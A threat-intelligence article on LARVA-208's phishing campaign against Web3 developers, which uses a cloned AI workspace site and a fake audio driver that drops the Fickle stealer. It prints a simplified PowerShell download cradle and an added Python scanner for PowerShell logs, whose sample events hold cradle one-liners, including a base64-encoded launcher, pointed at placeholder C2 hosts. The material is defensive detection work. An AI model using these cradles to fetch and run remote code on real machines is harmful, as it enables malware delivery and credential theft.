A sophisticated phishing campaign targeting Web3 developers has emerged, exploiting the growing interest in artificial intelligence platforms to deliver credential-stealing malware.
The threat actor LARVA-208, previously known for targeting IT staff through phone-based social engineering, has pivoted to focus on blockchain developers using a meticulously crafted fake AI workspace platform.
The attack begins with seemingly legitimate job offers or portfolio review requests sent to Web3 developers, directing them to apply on a fraudulent AI company's platform.
These lures (MITRE ATT&CK T1566.002, Spearphishing Link) push each victim to the malicious platform using a per-victim invitation code and email address, which makes the invitation look personalised and limits who can reach the page.
Once victims engage with the fake platform, they encounter a deceptive error message claiming their audio drivers are outdated or missing, prompting them to download what appears to be a genuine Realtek HD Audio Driver.
Catalyst analysts identified that LARVA-208 has strategically created a convincing replica of the legitimate Teampilot AI workspace platform through their malicious domain “norlax.ai.”
The lookalike domain (acquired under T1583.001 – Acquire Infrastructure: Domains) hosts a near-identical copy of the Teampilot interface to deceive developers who are familiar with legitimate AI collaboration tools; note that norlax.ai is not a typo of the real brand, so the deception relies on the cloned page rather than on a misspelled name.
The downloaded “driver” is actually sophisticated malware that executes embedded PowerShell commands (T1059.001 – PowerShell) to retrieve and deploy the Fickle stealer from LARVA-208’s command and control infrastructure.
The PowerShell execution can be represented as:

# Simplified representation of the malicious payload execution
Invoke-WebRequest -Uri "C2_SERVER_URL" | Invoke-Expression

This is the classic download cradle: the script body is fetched from the C2 server and passed straight to Invoke-Expression, so nothing is written to disk before execution. The Fickle stealer demonstrates comprehensive information-gathering capabilities, systematically harvesting device identification data, hardware specifications, operating system details, and geolocation information derived from the victim's IP address.
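The cradle above is detectable because PowerShell Script Block Logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) records the script text, including the decoded body of obfuscated launchers. The following Python scanner is an added example and is not code from the article, from Catalyst, or from the malware; it flags entries that combine a download primitive with an execution primitive, and it expands -EncodedCommand payloads (base64 of UTF-16LE) before matching so the alias form of the same cradle is caught. The log entries and the hostname c2.example.invalid are constructed for illustration and are not indicators from the campaign.

```python
"""Added example: flag PowerShell download cradles in 4104 ScriptBlockText.

Not the article's or the malware's code. Sample events below are constructed;
c2.example.invalid / updates.example.invalid are placeholder hostnames.
"""
import base64
import re

# Download primitives commonly used in PowerShell cradles (aliases included)
FETCH_RE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|curl|wget|Invoke-RestMethod|irm)\b"
    r"|DownloadString\s*\(|DownloadFile\s*\(|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE,
)
# Execution primitives that turn fetched text into running code
EXEC_RE = re.compile(
    r"\b(?:Invoke-Expression|iex)\b|\[ScriptBlock\]::Create\s*\(",
    re.IGNORECASE,
)
# -EncodedCommand and its abbreviations (-e, -ec, -enc, ...) take base64 UTF-16LE.
# The lookbehind keeps "Invoke-Expression" from being read as "-Expression <arg>".
ENCODED_RE = re.compile(r"(?<!\w)-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)


def expand_encoded(script_text: str) -> str:
    """Return script_text plus the decoded body of any -EncodedCommand argument,
    so the cradle patterns also hit launchers that hide the cradle in base64."""
    decoded_parts = []
    for blob in ENCODED_RE.findall(script_text):
        try:
            decoded_parts.append(
                base64.b64decode(blob, validate=True).decode("utf-16-le")
            )
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command: ignore this match
    if not decoded_parts:
        return script_text
    return script_text + "\n" + "\n".join(decoded_parts)


def classify(script_text: str) -> str:
    """'download-cradle' when both a fetch and an execute primitive are present,
    'download' for a bare fetch (e.g. -OutFile to disk), 'benign' otherwise."""
    expanded = expand_encoded(script_text)
    fetch = FETCH_RE.search(expanded) is not None
    execute = EXEC_RE.search(expanded) is not None
    if fetch and execute:
        return "download-cradle"
    if fetch:
        return "download"
    return "benign"


def scan_events(events):
    """events: iterable of (record_id, script_block_text) taken from 4104 entries.
    Returns [(record_id, verdict)] for every entry that is not benign."""
    findings = []
    for record_id, text in events:
        verdict = classify(text)
        if verdict != "benign":
            findings.append((record_id, verdict))
    return findings


# Constructed sample ScriptBlockText values (not real telemetry). The third one
# wraps the cradle in -enc the way a dropper would, built here with b64encode.
_ENC = base64.b64encode(
    "iwr -useb https://c2.example.invalid/s | iex".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    (101, 'Invoke-WebRequest -Uri "https://c2.example.invalid/a" | Invoke-Expression'),
    (102, "iex (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/p.ps1')"),
    (103, f"powershell.exe -nop -w hidden -enc {_ENC}"),
    (104, "Get-ChildItem C:\\Users | Select-Object Name"),
    (105, "Invoke-WebRequest -Uri https://updates.example.invalid/x.msi -OutFile x.msi"),
]

if __name__ == "__main__":
    for rid, verdict in scan_events(SAMPLE_EVENTS):
        print(rid, verdict)
```

Event 105 is deliberately classified as a plain download rather than a cradle: fetching a file to disk is routine in software deployment, and alerting on every Invoke-WebRequest is what produces alert fatigue. The fetch-plus-execute pairing, in the raw or the decoded text, is the signal worth paging on; in production the decoded text should also be kept for the analyst, since the C2 URL usually lives only there.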
The malware catalogs installed software, monitors active processes, and transmits all collected intelligence to LARVA-208’s command and control servers (T1583.004 – Server), which are hosted through FFv2’s bulletproof hosting service.
Security researchers have directly attributed this campaign to the broader Luminous Mantis threat group, indicating a coordinated effort to expand beyond traditional IT targeting into the lucrative Web3 developer ecosystem.